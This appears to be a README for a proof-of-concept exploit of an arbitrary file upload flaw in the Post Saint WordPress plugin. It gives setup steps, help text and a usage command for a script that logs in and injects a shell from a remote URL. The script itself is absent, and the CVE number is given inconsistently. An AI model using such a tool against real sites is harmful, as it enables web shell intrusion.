Post Saint <= 1.3.1 plugin for WordPress Arbitrary File Upload
# CVE-2024-1247-PoC
Post Saint <= 1.3.1 plugin for WordPress Arbitrary File Upload
# Description
The **Post Saint** plugin for WordPress (versions up to and including 1.3.1) is vulnerable to arbitrary file uploads due to missing capability checks and file type validation. Authenticated attackers with at least subscriber-level access can exploit this vulnerability to upload arbitrary files, potentially leading to remote code execution.
### Features
- Detects vulnerable plugin versions.
- Logs into WordPress using provided credentials.
- Exploits the vulnerability to upload arbitrary files.
### Usage
#### Prerequisites
1. Install Python 3.8 or later.
2. Install the required libraries:
```
pip install requests packaging urllib3
```
### Usage -help
```
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
```
### Example:
```
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
```
### Disclaimer
This script is for educational and research purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view